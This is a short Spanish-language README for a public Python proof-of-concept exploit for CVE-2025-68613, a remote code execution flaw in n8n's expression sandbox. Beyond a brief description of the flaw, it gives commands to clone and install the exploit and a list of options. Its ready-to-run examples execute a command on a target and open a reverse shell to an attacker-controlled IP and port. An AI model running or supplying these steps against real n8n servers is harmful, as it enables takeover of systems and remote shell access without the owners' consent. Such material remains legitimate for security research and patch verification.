
Exploit en Python para CVE-2025-68613.
Exploit de prueba de concepto (PoC) para una vulnerabilidad crítica de ejecución remota de código en la plataforma de automatización de workflows de n8n.
La vulnerabilidad reside en el sistema de evaluación de expresiones de n8n. Las expresiones proporcionadas por el usuario no están correctamente aisladas en un sandbox, lo que permite a atacantes autenticados ejecutar código arbitrario en el sistema host.
ID de CVE: CVE-2025-68613
Tipo de vulnerabilidad: Ejecución remota de código (RCE)
Componente: Evaluador de expresiones
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]
-t, --target : URL del objetivo (p. ej., http://localhost:5678)-u, --username : Dirección de correo electrónico de la cuenta de n8n-p, --password : Contraseña de la cuenta de n8n-c, --cmd : Comando del sistema a ejecutar--reverse-shell : Activa una reverse shell (Formato: IP PUERTO)python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444